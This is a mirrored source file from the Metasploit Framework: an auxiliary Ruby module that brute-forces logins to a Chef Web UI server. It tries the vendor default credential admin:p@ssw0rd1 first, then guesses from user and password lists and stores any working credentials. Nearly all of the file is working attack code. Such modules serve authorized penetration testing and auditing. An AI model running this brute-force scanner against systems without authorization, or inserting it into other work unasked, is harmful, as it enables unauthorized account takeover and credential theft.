Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/chef_webui_login.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/login_scanner/chef_webui'

7
require 'metasploit/framework/credential_collection'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::AuthBrute

12
  include Msf::Auxiliary::Report

13
  include Msf::Auxiliary::Scanner

14


15
  def initialize

16
    super(

17
      'Name' => 'Chef Web UI Brute Force Utility',

18
      'Description' => %q{

19
        This module attempts to login to Chef Web UI server instance using username and password

20
        combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It

21
        will also test for the default login (admin:p@ssw0rd1).

22
      },

23
      'Author' => [

24
        'hdm'

25
      ],

26
      'License' => MSF_LICENSE,

27
      'DefaultOptions' => {

28
        'SSL' => true,

29
      }

30
    )

31


32
    register_options(

33
      [

34
        Opt::RPORT(443),

35
        OptString.new('USERNAME', [false, 'The username to specify for authentication', '']),

36
        OptString.new('PASSWORD', [false, 'The password to specify for authentication', '']),

37
        OptString.new('TARGETURI', [ true, 'The path to the Chef Web UI application', '/']),

38
      ]

39
    )

40
  end

41


42
  #

43
  # main

44
  #

45
  def run_host(ip)

46
    init_loginscanner(ip)

47
    msg = @scanner.check_setup

48
    if msg

49
      print_brute :level => :error, :ip => rhost, :msg => msg

50
      return

51
    end

52


53
    print_brute :level => :status, :ip => rhost, :msg => ("Found Chef Web UI application at #{datastore['TARGETURI']}")

54
    bruteforce(ip)

55
  end

56


57
  def bruteforce(ip)

58
    @scanner.scan! do |result|

59
      case result.status

60
      when Metasploit::Model::Login::Status::SUCCESSFUL

61
        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"

62
        do_report(ip, rport, result)

63
        :next_user

64
      when Metasploit::Model::Login::Status::DENIED_ACCESS

65
        print_brute :level => :status, :ip => ip, :msg => "Correct credentials, but unable to login: '#{result.credential}'"

66
        do_report(ip, rport, result)

67
        :next_user

68
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT

69
        if datastore['VERBOSE']

70
          print_brute :level => :verror, :ip => ip, :msg => "Could not connect"

71
        end

72
        invalidate_login(

73
          address: ip,

74
          port: rport,

75
          protocol: 'tcp',

76
          public: result.credential.public,

77
          private: result.credential.private,

78
          realm_key: result.credential.realm_key,

79
          realm_value: result.credential.realm,

80
          status: result.status

81
        )

82
        :abort

83
      when Metasploit::Model::Login::Status::INCORRECT

84
        if datastore['VERBOSE']

85
          print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"

86
        end

87
        invalidate_login(

88
          address: ip,

89
          port: rport,

90
          protocol: 'tcp',

91
          public: result.credential.public,

92
          private: result.credential.private,

93
          realm_key: result.credential.realm_key,

94
          realm_value: result.credential.realm,

95
          status: result.status

96
        )

97
      end

98
    end

99
  end

100


101
  def do_report(ip, port, result)

102
    service_data = {

103
      address: ip,

104
      port: port,

105
      service_name: 'http',

106
      protocol: 'tcp',

107
      workspace_id: myworkspace_id

108
    }

109


110
    credential_data = {

111
      module_fullname: self.fullname,

112
      origin_type: :service,

113
      private_data: result.credential.private,

114
      private_type: :password,

115
      username: result.credential.public,

116
    }.merge(service_data)

117


118
    credential_core = create_credential(credential_data)

119


120
    login_data = {

121
      core: credential_core,

122
      last_attempted_at: DateTime.now,

123
      status: result.status

124
    }.merge(service_data)

125


126
    create_credential_login(login_data)

127
  end

128


129
  def init_loginscanner(ip)

130
    @cred_collection = build_credential_collection(

131
      username: datastore['USERNAME'],

132
      password: datastore['PASSWORD']

133
    )

134


135
    # Always try the default first

136
    @cred_collection.prepend_cred(

137
      Metasploit::Framework::Credential.new(public: 'admin', private: 'p@ssw0rd1')

138
    )

139


140
    @scanner = Metasploit::Framework::LoginScanner::ChefWebUI.new(

141
      configure_http_login_scanner(

142
        uri: datastore['TARGETURI'],

143
        cred_details: @cred_collection,

144
        stop_on_success: datastore['STOP_ON_SUCCESS'],

145
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

146
        connection_timeout: 5,

147
        http_username: datastore['HttpUsername'],

148
        http_password: datastore['HttpPassword']

149
      )

150
    )

151
  end

152
end

153


154